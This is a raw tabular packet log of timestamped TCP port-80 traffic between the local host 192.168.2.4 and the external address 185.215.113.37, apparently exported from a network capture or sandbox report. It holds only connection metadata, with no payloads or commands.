Oct 2, 2024 18:19:29.867749929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867764950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867772102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867779970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867794991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867799044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867820978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867847919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868199110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868216038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868231058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868246078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868252993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868263006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868271112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868300915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868350029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868366003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868401051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868411064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868417025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868429899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868438005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868446112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868460894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868468046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868474960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868488073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868490934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868505001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868520021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868521929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868539095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868554115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868567944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868567944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868568897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868585110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868598938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868603945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868603945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868613958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868628979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.868637085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868654966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.868680000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869333982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869350910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869379997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869401932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869417906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869432926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869438887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869447947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869483948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869483948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869483948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869483948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869489908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869504929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869519949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869529963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869534016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869549990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869561911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869565964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869580984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869587898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869596004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869600058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869611979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869618893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869626999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869642973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869646072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869658947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869673967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869683027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869689941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869704962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869712114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869718075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869728088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869764090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869781017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.869982004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.869997978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870012999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870023012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870028973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870043993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870049953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870062113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870093107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870110989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870126009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870138884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870153904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870160103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870172977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870198011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870249033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870265961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870280981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870287895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870297909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870312929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870320082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870328903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870345116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870347023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870376110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870394945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870404959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870418072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870434999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870438099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870450020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870460987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870466948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870475054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870481968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870496035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870496988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870512962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870527983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870532036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870544910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870551109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870562077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870569944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870578051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870589018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870593071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870600939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870609045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870623112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870623112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870635986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870637894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870652914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870667934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870676041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870683908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870698929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.870707989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870727062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.870754957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871273041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871289968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871315956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871334076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871337891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871352911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871362925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871368885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871391058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871391058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871407986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871411085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871417046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871423006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871431112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871437073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871452093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871464968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871465921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871479988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871490955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871495962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871510983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871511936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871526003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871540070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871545076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871555090 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871570110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871579885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871584892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871598959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871613979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871618032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871628046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871643066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871651888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871658087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871666908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871673107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.871681929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871714115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.871990919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872006893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872020960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872035980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872041941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.872051001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872066021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872066021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.872080088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.872097969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.872113943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914483070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914530039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914546013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914575100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914593935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914621115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914639950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914695024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914714098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914735079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914736032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914757013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914771080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914773941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914787054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914830923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914841890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914848089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914871931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914894104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914896965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.914916992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.914956093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915002108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915018082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915034056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915040970 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915050030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915066004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915071011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915081024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915086985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915119886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915241957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915258884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915275097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915288925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915304899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915307045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915328979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915338993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915347099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915360928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915386915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915394068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915484905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915503979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915519953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915535927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915541887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915551901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915568113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915579081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915584087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915601969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915608883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915632010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915662050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915744066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915760994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915776968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915785074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915792942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915810108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915811062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915822983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915824890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.915844917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915857077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.915872097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916058064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916071892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916089058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916105032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916111946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916121006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916136980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916146994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916153908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916168928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916168928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916184902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916193962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916201115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916218042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916224003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916232109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916244984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916265011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916284084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916452885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916469097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916485071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916500092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916510105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916515112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916529894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916538000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916544914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916558027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916560888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916577101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916584015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916591883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916606903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916614056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916624069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916629076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916640043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916660070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916682005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916860104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916878939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916904926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916918993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916920900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.916940928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916956902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916970968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916986942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.916994095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.917001009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917016029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917031050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917035103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.917047024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917057037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.917062044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917077065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917078972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.917092085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.917114973 CEST	49737	80	192.168.2.4	185.215.113.37
